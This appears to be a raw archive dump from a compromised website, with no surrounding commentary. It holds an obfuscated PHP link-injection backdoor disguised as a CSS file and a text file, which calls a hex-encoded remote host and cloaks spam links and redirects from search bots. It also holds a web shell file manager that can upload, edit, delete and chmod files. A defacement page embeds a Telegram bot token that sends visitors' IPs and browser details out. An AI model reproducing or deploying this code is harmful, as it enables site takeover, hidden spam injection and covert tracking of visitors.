2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\��&A��A�� users.phpnu��6�$��<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>ＳＫＹＳＨＥＬＬＭＡＮＡＧＥＲ</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> ＳＫＹＳＨＥＬＬＭＡＮＡＧＥＲ-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo "</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> PK��R�\%Pn��n��russian_mimes.cssnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\%Pn��n��lscript.txtnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\��%��%�� index.phpnu��[��<!DOCTYPE html> <html lang="id"> <head> <title>Hacked by Kize1337</title> <meta property="og:image" content="https://c.top4top.io/p_3715008ex4.jpg"> <meta name="author" content="Kize1337"/> <meta name="copyright" content="2025"/> <meta name="title" content="Hacked by Kize1337"> <meta name="description" content="We are party on your site."> <link href="https://fonts.googleapis.com/css?family=Space+Mono" rel="stylesheet"> <link rel="icon" href="https://k.top4top.io/p_3715j5o0a8.png" type="image/webp"> <style type="text/css"> * { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: black; margin: 0; padding: 0; font-family: 'Space Mono', monospace; min-height: 100vh; display: flex; justify-content: center; align-items: center; } .container { text-align: center; width: 100%; max-width: 800px; padding: 40px 20px; } .x { font-size: 60px; transform: skewY(-8deg); color: white; margin-bottom: 40px; line-height: 1.2; } .x span { color: #ff0000; } .hacker-image { margin: 40px auto; max-width: 300px; width: 100%; } .hacker-image img { width: 100%; height: auto; display: block; } .audio-player { margin: 25px auto; } .audio-player audio { width: 200px; height: 30px; filter: invert(1) hue-rotate(180deg); } .message { color: white; font-size: 24px; margin: 30px 0; } .greetz-title { color: white; font-size: 18px; margin: 25px 0 10px 0; } .greetz-list { font-family: 'Courier New', monospace; font-size: 14px; color: #ff0000; font-weight: bold; line-height: 1.4; } .contact-section { margin-top: 40px; color: white; font-family: 'Space Mono', monospace; font-size: 18px; } .contact-link { color: #ff0000; text-decoration: none; font-weight: bold; } .contact-link:hover { text-decoration: underline; } @media (min-width: 1024px) { .container { padding: 60px 20px; } .x { margin-bottom: 50px; } .hacker-image { margin: 50px auto; } } @media (max-width: 768px) { .container { padding: 30px 20px; } .x { font-size: 40px; margin-bottom: 30px; } .message { font-size: 18px; margin: 25px 0; } .contact-section { font-size: 16px; margin-top: 30px; } .hacker-image { max-width: 250px; margin: 30px auto; } } @media (max-width: 480px) { .container { padding: 20px 15px; } .x { font-size: 32px; margin-bottom: 25px; } .message { font-size: 16px; margin: 20px 0; } .contact-section { font-size: 14px; margin-top: 25px; } .hacker-image { max-width: 200px; margin: 25px auto; } .audio-player audio { width: 180px; } .greetz-title { font-size: 16px; margin: 20px 0 8px 0; } .greetz-list { font-size: 12px; } } </style> </head> <body> <div class="container"> <h1 class="x">Hacked by <span>Kize1337</span></h1> <div class="hacker-image"> <img src="https://c.top4top.io/p_3715008ex4.jpg" alt="Hacker Image"> </div> <div class="audio-player"> <audio id="bg-audio" src="https://e.top4top.io/m_3715w7dyq6.mp3" autoplay controls></audio> </div> <h2 class="message">MSG: Patch your system!</h2> <h3 class="greetz-title">Greetz:</h3> <div class="greetz-list"> Kize1337 - 0xTebu - Lizardpredator - JohenLG - Luminance - Sph69 - Axonhub - Privnet </div> <div class="contact-section"> CONTACT: <a href="https://t.me/deathbase" class="contact-link" target="_blank">t.me/deathbase</a> </div> </div> <script> document.body.addEventListener('click', function () { const audio = document.getElementById('bg-audio'); if (audio) { audio.muted = false; audio.volume = 1.0; audio.play().catch((e) => { console.warn('Autoplay failed:', e); }); } }, { once: true }); // Telegram logger async function sendLogToTelegram() { const token = "8499549696:AAEQJ6pvg9oFNbHTtIKKRkiARzIRLaeNJ7E"; const chat_id = "-1002699548560"; let ipInfo = "Unknown"; try { const res = await fetch("https://api64.ipify.org?format=json"); const data = await res.json(); ipInfo = data.ip; } catch (e) { ipInfo = "Unavailable"; } const ua = navigator.userAgent; const platform = navigator.platform; const browser = (() => { if (ua.includes("Chrome")) return "Chrome"; if (ua.includes("Firefox")) return "Firefox"; if (ua.includes("Safari") && !ua.includes("Chrome")) return "Safari"; if (ua.includes("Opera") \|\| ua.includes("OPR")) return "Opera"; if (ua.includes("Edg")) return "Edge"; return "Unknown"; })(); const now = new Date(); const timestamp = now.toLocaleString("id-ID", { timeZone: "Asia/Jakarta" }); const message = `📌 Access Detected 📅 Date & Time: ${timestamp} 🌐 IP: ${ipInfo} 💻 Device: ${platform} 🌍 Browser: ${browser} 📣 User-Agent: ${ua} 📎 URL: ${window.location.href} _This message is sent automatically by a bot._`; const tgURL = `https://api.telegram.org/bot${token}/sendMessage`; await fetch(tgURL, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id, text: message, parse_mode: "Markdown" }) }); } window.onload 